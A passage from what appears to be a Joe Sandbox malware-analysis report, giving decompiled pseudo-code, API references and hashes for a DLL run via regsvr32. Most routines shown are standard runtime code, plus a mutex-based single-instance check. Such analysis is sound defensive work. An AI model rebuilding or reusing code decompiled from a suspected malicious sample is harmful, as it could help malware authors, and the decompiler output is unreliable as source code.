    							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    							return _t69;
    						}
    					} else {
    						 *0x6f85cfc8 = 1;
    						if(E6F848EEE(_t132) != 0) {
    							E6F849A46(E6F849A87());
    							E6F849A64();
    							_t80 = E6F84D38A(0x6f8551fc, 0x6f85520c);
    							_pop(_t102);
    							if(_t80 == 0 && E6F848EC3(1, _t102) != 0) {
    								E6F84D345(_t102, 0x6f8551bc, 0x6f8551f8);
    								 *0x6f85cfc8 = 2;
    								_t85 = 0;
    								 *((char*)(_t123 - 0x19)) = 0;
    							}
    						}
    						 *(_t123 - 4) = 0xfffffffe;
    						E6F8493D9();
    						if(_t85 != 0) {
    							goto L11;
    						} else {
    							_t121 = E6F849A81();
    							_t138 =  *_t121;
    							if( *_t121 != 0) {
    								_push(_t121);
    								if(E6F84904D(_t85, _t106, _t121, _t138) != 0) {
    									 *0x6f8551b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
    									 *((intOrPtr*)( *_t121))();
    								}
    							}
    							 *0x6f85cfec =  *0x6f85cfec + 1;
    							_t44 = 1;
    						}
    						L12:
    						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    						return _t44;
    					}
    				}
    			}





















    APIs
    • __RTC_Initialize.LIBCMT ref: 6F849343
      • Part of subcall function 6F849A46: InitializeSListHead.KERNEL32(6F85D000,6F84934D,6F85A5D0,00000010,6F8492DE,?,?,?,6F849506,?,00000001,?,?,00000001,?,6F85A618), ref: 6F849A4B
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F8493AD
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 3231365870-0
    • Opcode ID: 37a2584e374576bf1823574d66b7bbef8ccc9afddaf8c63497603829fc23b5b8
    • Instruction ID: 87716d0d21df0da7be0cb48bc2b2f1b6f70a5fb30d4950c4f788d4c5eab19385
    • Opcode Fuzzy Hash: 37a2584e374576bf1823574d66b7bbef8ccc9afddaf8c63497603829fc23b5b8
    • Instruction Fuzzy Hash: 3B21D23264830DBFDFA49BBC960579C3BA1AF0322CF101CDAD4846F1C9DB765054CAA1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E6F84CC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {
    
    				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
    			}



    APIs
      • Part of subcall function 6F84FD93: GetEnvironmentStringsW.KERNEL32 ref: 6F84FD9C
      • Part of subcall function 6F84FD93: _free.LIBCMT ref: 6F84FDFB
      • Part of subcall function 6F84FD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F84FE0A
    • _free.LIBCMT ref: 6F84CCBD
    • _free.LIBCMT ref: 6F84CCC4
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: 3c73674de6b33276b548eefa2b705e6ccd362aa9b1f92efc60d5405559ddd177
    • Instruction ID: 2cc5cd5d279b67e1414580ee01fce8a40c4eb13f82c8aaf6d0fe58f801aa9502
    • Opcode Fuzzy Hash: 3c73674de6b33276b548eefa2b705e6ccd362aa9b1f92efc60d5405559ddd177
    • Instruction Fuzzy Hash: 6DE09B7398DA1866E766967D7E40659164E4F8333CB110FDADC10CF2C2EBA4841A41D6
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 566 6f851368-6f851375 call 6f84dc48 568 6f85137a-6f851385 566->568 569 6f851387-6f851389 568->569 570 6f85138b-6f851393 568->570 571 6f8513d6-6f8513e2 call 6f84dc0e 569->571 570->571 572 6f851395-6f851399 570->572 573 6f85139b-6f8513d0 call 6f84df9b 572->573 578 6f8513d2-6f8513d5 573->578 578->571
    C-Code - Quality: 95%
    			E6F851368(void* __edi, void* __eflags) {
    				intOrPtr _v12;
    				char _t17;
    				void* _t18;
    				intOrPtr* _t32;
    				char _t35;
    				void* _t37;
    
    				_push(_t27);
    				_t17 = E6F84DC48(0x40, 0x38); // executed
    				_t35 = _t17;
    				_v12 = _t35;
    				if(_t35 != 0) {
    					_t2 = _t35 + 0xe00; // 0xe00
    					_t18 = _t2;
    					__eflags = _t35 - _t18;
    					if(__eflags != 0) {
    						_t3 = _t35 + 0x20; // 0x20
    						_t32 = _t3;
    						_t37 = _t18;
    						do {
    							_t4 = _t32 - 0x20; // 0x0
    							E6F84DF9B(__eflags, _t4, 0xfa0, 0);
    							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
    							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
    							 *_t32 = 0;
    							_t32 = _t32 + 0x38;
    							 *((intOrPtr*)(_t32 - 0x34)) = 0;
    							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
    							 *((char*)(_t32 - 0x2c)) = 0xa;
    							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
    							 *((char*)(_t32 - 0x26)) = 0;
    							__eflags = _t32 - 0x20 - _t37;
    						} while (__eflags != 0);
    						_t35 = _v12;
    					}
    				} else {
    					_t35 = 0;
    				}
    				E6F84DC0E(0);
    				return _t35;
    			}









    APIs
      • Part of subcall function 6F84DC48: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F84DB5E,00000001,00000364,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?), ref: 6F84DC89
    • _free.LIBCMT ref: 6F8513D7
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 848e4589ec0cadd899f29504caf98aaa220363ac6646e292d2934455128d2eb4
    • Instruction ID: 9d0973cc5f28a0539c9f91d97ad1279df0964e8f569baa60bbb1081ef62a9641
    • Opcode Fuzzy Hash: 848e4589ec0cadd899f29504caf98aaa220363ac6646e292d2934455128d2eb4
    • Instruction Fuzzy Hash: AB01D6736047166BD3218F69C8849CDFBA9FB053B0F140AA9E555ABAC0E3B0A811C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84DC48(signed int _a4, signed int _a8) {
    				void* _t8;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x6f85d9d8, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E6F850684();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E6F84D46D(__eflags))) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						__eflags = E6F84C4BB(__eflags, _t19);
    						if(__eflags == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}







    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F84DB5E,00000001,00000364,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?), ref: 6F84DC89
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 9281a711eb7738d69c7acb2aec8f75760eba54c81e1b624a7f8c1e1590fde03e
    • Instruction ID: 98b32cdd685fd3f4bb30a816fbe13cbd9c01200d8a4320c756b216e8dcb461dc
    • Opcode Fuzzy Hash: 9281a711eb7738d69c7acb2aec8f75760eba54c81e1b624a7f8c1e1590fde03e
    • Instruction Fuzzy Hash: 21F0BB3320472CA7DB159A255908A963B8A9F41774F0489D2EC149F380DBA4E41281E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E6F848E01(signed int __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				void* _t54;
    				signed int _t55;
    				signed int _t59;
    				intOrPtr _t72;
    				signed int _t73;
    				signed int _t74;
    				signed int _t75;
    				signed int _t78;
    				signed int _t79;
    				signed int _t85;
    				intOrPtr _t89;
    				intOrPtr _t90;
    				intOrPtr* _t92;
    				signed int _t93;
    				intOrPtr* _t97;
    				signed int _t103;
    				signed int _t109;
    				intOrPtr* _t112;
    				signed int _t115;
    				signed int _t118;
    				signed int _t123;
    				void* _t125;
    				void* _t126;
    				void* _t128;
    
    				_t109 = __edx;
    				while(1) {
    					_push(_a4);
    					_t54 = E6F84C544(); // executed
    					if(_t54 != 0) {
    						return _t54;
    					}
    					_t55 = E6F84C4BB(__eflags, _a4);
    					__eflags = _t55;
    					if(_t55 == 0) {
    						__eflags = _a4 - 0xffffffff;
    						if(_a4 != 0xffffffff) {
    							_push(_t125);
    							_t125 = _t128;
    							_t128 = _t128 - 0xc;
    							E6F849606( &_v20);
    							E6F84A50C( &_v20, 0x6f85a634);
    							asm("int3");
    						}
    						_push(_t125);
    						_t126 = _t128;
    						E6F843110( &_v20);
    						E6F84A50C( &_v20, 0x6f85a538);
    						asm("int3");
    						_push(_t126);
    						 *0x6f85cff0 =  *0x6f85cff0 & 0x00000000;
    						 *0x6f85c010 =  *0x6f85c010 | 0x00000001;
    						_t59 = IsProcessorFeaturePresent(0xa);
    						__eflags = _t59;
    						if(_t59 != 0) {
    							_v28 = _v28 & 0x00000000;
    							_push(_t89);
    							_t112 =  &_v48;
    							asm("cpuid");
    							_t90 = _t89;
    							 *_t112 = 0;
    							 *((intOrPtr*)(_t112 + 4)) = _t89;
    							 *((intOrPtr*)(_t112 + 8)) = 0;
    							 *(_t112 + 0xc) = _t109;
    							_v24 = _v48;
    							_v20 = _v36 ^ 0x49656e69;
    							_v16 = _v44 ^ 0x756e6547;
    							_push(_t90);
    							asm("cpuid");
    							_t92 =  &_v48;
    							 *_t92 = 1;
    							 *((intOrPtr*)(_t92 + 4)) = _t90;
    							__eflags = _v16 | _v40 ^ 0x6c65746e | _v20;
    							 *((intOrPtr*)(_t92 + 8)) = 0;
    							 *(_t92 + 0xc) = _t109;
    							if((_v16 | _v40 ^ 0x6c65746e | _v20) != 0) {
    								L17:
    								_t115 =  *0x6f85cff4; // 0x2
    							} else {
    								_t85 = _v48 & 0x0fff3ff0;
    								__eflags = _t85 - 0x106c0;
    								if(_t85 == 0x106c0) {
    									L16:
    									_t118 =  *0x6f85cff4; // 0x2
    									_t115 = _t118 | 0x00000001;
    									 *0x6f85cff4 = _t115;
    								} else {
    									__eflags = _t85 - 0x20660;
    									if(_t85 == 0x20660) {
    										goto L16;
    									} else {
    										__eflags = _t85 - 0x20670;
    										if(_t85 == 0x20670) {
    											goto L16;
    										} else {
    											__eflags = _t85 - 0x30650;
    											if(_t85 == 0x30650) {
    												goto L16;
    											} else {
    												__eflags = _t85 - 0x30660;
    												if(_t85 == 0x30660) {
    													goto L16;
    												} else {
    													__eflags = _t85 - 0x30670;
    													if(_t85 != 0x30670) {
    														goto L17;
    													} else {
    														goto L16;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t103 = _v40;
    							_t72 = 7;
    							_v16 = _t103;
    							__eflags = _v24 - _t72;
    							if(_v24 < _t72) {
    								_t93 = _v28;
    							} else {
    								_push(_t92);
    								asm("cpuid");
    								_t97 =  &_v48;
    								 *_t97 = _t72;
    								 *((intOrPtr*)(_t97 + 4)) = _t92;
    								 *((intOrPtr*)(_t97 + 8)) = 0;
    								_t103 = _v16;
    								 *(_t97 + 0xc) = _t109;
    								_t93 = _v44;
    								__eflags = _t93 & 0x00000200;
    								if((_t93 & 0x00000200) != 0) {
    									 *0x6f85cff4 = _t115 | 0x00000002;
    								}
    							}
    							_t73 =  *0x6f85c010; // 0x6f
    							_t74 = _t73 | 0x00000002;
    							 *0x6f85cff0 = 1;
    							 *0x6f85c010 = _t74;
    							__eflags = _t103 & 0x00100000;
    							if((_t103 & 0x00100000) != 0) {
    								_t75 = _t74 | 0x00000004;
    								 *0x6f85cff0 = 2;
    								 *0x6f85c010 = _t75;
    								__eflags = _t103 & 0x08000000;
    								if((_t103 & 0x08000000) != 0) {
    									__eflags = _t103 & 0x10000000;
    									if((_t103 & 0x10000000) != 0) {
    										asm("xgetbv");
    										_v32 = _t75;
    										_v28 = _t109;
    										_t123 = 6;
    										__eflags = (_v32 & _t123) - _t123;
    										if((_v32 & _t123) == _t123) {
    											_t78 =  *0x6f85c010; // 0x6f
    											_t79 = _t78 | 0x00000008;
    											 *0x6f85cff0 = 3;
    											 *0x6f85c010 = _t79;
    											__eflags = _t93 & 0x00000020;
    											if((_t93 & 0x00000020) != 0) {
    												 *0x6f85cff0 = 5;
    												 *0x6f85c010 = _t79 | 0x00000020;
    												__eflags = (_t93 & 0xd0030000) - 0xd0030000;
    												if((_t93 & 0xd0030000) == 0xd0030000) {
    													__eflags = (_v32 & 0x000000e0) - 0xe0;
    													if((_v32 & 0x000000e0) == 0xe0) {
    														 *0x6f85c010 =  *0x6f85c010 | 0x00000040;
    														__eflags =  *0x6f85c010;
    														 *0x6f85cff0 = _t123;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						__eflags = 0;
    						return 0;
    					} else {
    						continue;
    					}
    					break;
    				}
    			}





































    APIs
    • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6F849644
      • Part of subcall function 6F84A50C: RaiseException.KERNEL32(E06D7363,00000001,00000003,6F849657,?,?,?,6F849657,?,6F85A538), ref: 6F84A56C
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
    • String ID:
    • API String ID: 3447279179-0
    • Opcode ID: b415df77f64cc558b89977c41d85122ddf24359ccc595733f7e152e7bcf57395
    • Instruction ID: 01dcafc7f5b7b423c5ece68c9f27027e781824f6e68d10fc2840805c63b8bd2a
    • Opcode Fuzzy Hash: b415df77f64cc558b89977c41d85122ddf24359ccc595733f7e152e7bcf57395
    • Instruction Fuzzy Hash: C5F0543480830DB6CF14AABCEE4599D776C6A06218B504EE2A934AD1D1FF30E759C5D4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E6F841A60(void* __ebx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __ebp;
    				intOrPtr _t16;
    				void* _t23;
    
    				_t23 = __ebx;
    				_v12 = _a4 + 0x23;
    				_t24 = _v12;
    				if(_v12 <= _a4) {
    					E6F846DB0();
    				}
    				_t26 = _v12;
    				_t16 = E6F846AF0(_v12); // executed
    				_v8 = _t16;
    				do {
    					if(_v8 == 0) {
    						do {
    							E6F84C25F(_t23, _t24, _t26, __eflags);
    							__eflags = 0;
    						} while (0 != 0);
    					} else {
    					}
    					_t24 = 0;
    				} while (0 != 0);
    				_v16 = _v8 + 0x00000023 & 0xffffffe0;
    				 *((intOrPtr*)(_v16 + 0xfffffffffffffffc)) = _v8;
    				return _v16;
    			}










    APIs
    • Concurrency::cancel_current_task.LIBCPMTD ref: 6F841A77
      • Part of subcall function 6F846DB0: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 6F846DB9
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
    • String ID:
    • API String ID: 2103942186-0
    • Opcode ID: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
    • Instruction ID: 7e95a1b7bff2f997d236814216c31d27611998e55bde1d5c0fdbc204c6d25eb6
    • Opcode Fuzzy Hash: b76c894fc18651f0dd9a731209d8a28e113a96b5c028739d6e19fc56e693ba99
    • Instruction Fuzzy Hash: F0F04F74D0050CABCB08DFACC582A9DF7B5AF45348F1089EAD9119F384D730AA90CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84E649(long _a4) {
    				void* _t4;
    				long _t8;
    
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E6F84D46D(__eflags))) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x6f85d9d8, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E6F850684();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					__eflags = E6F84C4BB(__eflags, _t8);
    					if(__eflags == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}






    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F850272,?,00000000,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7), ref: 6F84E67B
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ec2d64e0e6e78fc444defd55f36871d7879f9fd8feff7561e77e12a1cd7372f2
    • Instruction ID: afc394a5966065c6b1a942908eb170d81dd56113e8d7ff056a6de642c711bced
    • Opcode Fuzzy Hash: ec2d64e0e6e78fc444defd55f36871d7879f9fd8feff7561e77e12a1cd7372f2
    • Instruction Fuzzy Hash: C3E02B3124171D67EB10977A5C0479A3A8CAF537B4F020ED29C54DE0C0EB25F810C3E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E6F8469A0(CHAR* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    
    				_v8 = E6F842310(0, 0);
    				_v12 = CreateMutexA(0, 1, _a4);
    				if( *((intOrPtr*)(E6F8423D0(0, 0)))() != 0xb7) {
    					return 1;
    				}
    				_v16 = E6F842700(0, 0);
    				_v16(_v12);
    				return 0;
    			}







    APIs
    • CreateMutexA.KERNEL32(00000000,00000001,6F848BA2,00000000,00000000,?,6F848BA2,?), ref: 6F8469BA
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: CreateMutex
    • String ID:
    • API String ID: 1964310414-0
    • Opcode ID: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
    • Instruction ID: f97ce42b26dfe4c6f166e84954dc1c29ecd594a92054ccf5ea96b0e7f6699927
    • Opcode Fuzzy Hash: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
    • Instruction Fuzzy Hash: 22F03074E8830CBBE750ABF88C06B9DBBB4DF04B01F1049D4FA09EE1C0D6B59A508765
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F8419F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    
    				_v20 = __ecx;
    				_v16 = E6F842190(__eflags);
    				_v8 =  *((intOrPtr*)(E6F8412B0(_a8)));
    				_v12 =  *((intOrPtr*)(E6F8412B0(_a4)));
    				return StrCmpIW(_v12, _v8);
    			}








    APIs
    • StrCmpIW.SHLWAPI(?,00000000,?,6F845D13,?,6F845D13,?,00000000,6F84265E,E463DA3C,?,6F845DAA), ref: 6F841A25
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
    • Instruction ID: 62b06b3219bd6a78961571a62fa89fd106193182bbeb86f1ed09a4ab18608664
    • Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
    • Instruction Fuzzy Hash: 72E04C79D0460CBF8B05DFE8D44489EB7B5AB58304B108999E615DB350DB349A109B94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84C2B0(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* _t5;
    
    				_v8 = 0;
    				_t5 = E6F84DC0E(_a4); // executed
    				return _t5;
    			}






    APIs
    • _free.LIBCMT ref: 6F84C2C3
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ErrorFreeHeapLast_free
    • String ID:
    • API String ID: 1353095263-0
    • Opcode ID: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
    • Instruction ID: 7e789886bb6fa8db67f3d9d8ab753ad4b69838ed9ab4cc7355b732d06e0e4b6f
    • Opcode Fuzzy Hash: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
    • Instruction Fuzzy Hash: D9C04C7250020CFBDB05DB85DA06A4E7BA9DB80368F204094E4155B290DBB1EE459690
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F846FF0(long _a4) {
    				void* _t4;
    
    				_t4 = HeapAlloc(E6F8483B0(), 0, _a4); // executed
    				return _t4;
    			}





    APIs
    • HeapAlloc.KERNEL32(00000000,00000000,?,?,6F847621,?,?), ref: 6F846FFF
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AllocHeap
    • String ID:
    • API String ID: 4292702814-0
    • Opcode ID: 6c5e8dabe631fde476d12a4534f63eae3969ce94ac74811cbe465d3c59002265
    • Instruction ID: 4064a3874a428fbf7589521c33879761902f0bae86e503806cb4f8436b34a8e9
    • Opcode Fuzzy Hash: 6c5e8dabe631fde476d12a4534f63eae3969ce94ac74811cbe465d3c59002265
    • Instruction Fuzzy Hash: 43C09BB115470C7BDD40A7EC9809F56775C9724A15F004451BB048E141C775B42485F5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6F849839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
    				char _v0;
    				struct _EXCEPTION_POINTERS _v12;
    				intOrPtr _v80;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v608;
    				intOrPtr _v612;
    				void* _v616;
    				intOrPtr _v620;
    				char _v624;
    				intOrPtr _v628;
    				intOrPtr _v632;
    				intOrPtr _v636;
    				intOrPtr _v640;
    				intOrPtr _v644;
    				intOrPtr _v648;
    				intOrPtr _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				intOrPtr _v664;
    				intOrPtr _v668;
    				char _v808;
    				char* _t39;
    				long _t49;
    				intOrPtr _t51;
    				void* _t54;
    				intOrPtr _t55;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    
    				_t59 = __esi;
    				_t58 = __edi;
    				_t57 = __edx;
    				if(IsProcessorFeaturePresent(0x17) != 0) {
